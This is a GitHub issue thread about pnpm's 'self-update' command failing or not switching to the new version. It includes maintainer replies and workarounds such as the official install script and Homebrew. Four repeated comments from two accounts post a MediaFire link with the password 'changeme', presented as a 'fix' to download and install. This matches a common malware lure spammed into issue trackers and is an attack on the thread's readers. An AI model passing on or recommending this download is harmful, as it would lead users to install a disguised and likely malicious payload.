### ISSUE TITLE
pnpm self-update not work

### ISSUE THREAD

**Issue by hellohejinyu** [pnpm/pnpm#8469]
### Verify latest release

- [ ] I verified that the issue exists in the latest pnpm release

### pnpm version

9.8.0

### Reproduction steps

<img width="538" alt="image" src="https://github.com/user-attachments/assets/408dd8e7-598d-4725-a53b-470b55f0d767">

When I executed `pnpm install` to install dependencies, I was notified that a new version was available. Additionally, I noticed that there is a new command `pnpm self-update`.

<img width="877" alt="image" src="https://github.com/user-attachments/assets/40d0f4ee-84db-42b6-aaba-9278299db812">

So, I tried to run `pnpm self-update` to upgrade, but the console reported an error.

### Describe the Bug

`pnpm self-update` encountered an error and could not complete the upgrade.

### Expected Behavior

I hope it can upgrade successfully.

### Which Node.js version are you using?

20.13.0

### Which operating systems have you used?

- [X] macOS
- [ ] Windows
- [ ] Linux

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by zkochan** [comment]
Do you still get the error? Looks like a registry issue. The package is now present in the registry, I just checked.

**Comment by hellohejinyu** [comment]
<img width="556" alt="image" src="https://github.com/user-attachments/assets/019c3540-fb71-4029-8c9f-fa32bddf55d9">
@zkochan Yes, it seems to work now.

**Comment by miervaldis42** [comment]
I think it still does not work, at least on windows. I might have done something wrong, so here is what happened:

I saw the notification of prompting me to update my pnpm version from 12 to 14 while working on 3 projects during the past week, so I just updated it by using `pnpm self-update`.
However, after doing so, when I used `pnpm -v`, the version is still 12.

![Capture d’écran 2024-12-02 144552](https://github.com/user-attachments/assets/7b2dbd41-78e5-4a45-99af-6c311f950f90)

When I ran again `pnpm self-update`, it indicated version 14 is already installed but by using `pnpm -v`, the version is still 12.
The only way I found to work around was to uninstall pnpm globally and then, install it again. Then, when I checked the version, itt was 14.

**Comment by prenaissance** [comment]
> I think it still does not work, at least on windows. I might have done something wrong, so here is what happened:
> 
> I saw the notification of prompting me to update my pnpm version from 12 to 14 while working on 3 projects during the past week, so I just updated it by using `pnpm self-update`. However, after doing so, when I used `pnpm -v`, the version is still 12.
> 
> ![Capture d’écran 2024-12-02 144552](https://private-user-images.githubusercontent.com/31883227/391566822-7b2dbd41-78e5-4a45-99af-6c311f950f90.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMyMTE5MjIsIm5iZiI6MTczMzIxMTYyMiwicGF0aCI6Ii8zMTg4MzIyNy8zOTE1NjY4MjItN2IyZGJkNDEtNzhlNS00YTQ1LTk5YWYtNmMzMTFmOTUwZjkwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDMlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjAzVDA3NDAyMlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTJmMTgwYTJhZTgwNTM1ZTkyODRjNDZkNjUxYWU1ZTc2OGU5MDllNGU2N2Y5MjdmOWI5YjAwYThhZDBjYjQzYzEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.MMeUk2GU2fwQZ7FBXXIn4kXXnXbXRuVVoQpRcClYmqk)
> 
> When I ran again `pnpm self-update`, it indicated version 14 is already installed but by using `pnpm -v`, the version is still 12. The only way I found to work around was to uninstall pnpm globally and then, install it again. Then, when I checked the version, itt was 14.

Can confirm that I get the same result on Ubuntu 22.04, using zsh. It downloads the update, but doesn't activate it.

```
➜  ~ ls /home/prenaissance/.local/share/pnpm/.tools/@pnpm+linux-x64
9.10.0  9.12.0  9.14.4
➜  ~ pnpm -v
9.12.0
```

**Comment by prenaissance** [comment]
Updating pnpm using the install script from https://pnpm.io/installation does work, although it produces a misleading output:
```bash
➜  ~ curl -fsSL https://get.pnpm.io/install.sh | sh -
==> Downloading pnpm binaries 9.14.4
 WARN  using --force I sure hope you know what you are doing
Copying pnpm CLI from /tmp/tmp.R9Yaj2vgrt/pnpm to /home/prenaissance/.local/share/pnpm/pnpm
No changes to the environment were made. Everything is already up to date.
➜  ~ pnpm -v
9.14.4
```

**Comment by laur-t** [comment]
If you're on a Mac and installed pnpm via homebrew (`which pnpm` points to homebrew) then you need to update it using homebrew: `brew upgrade pnpm`
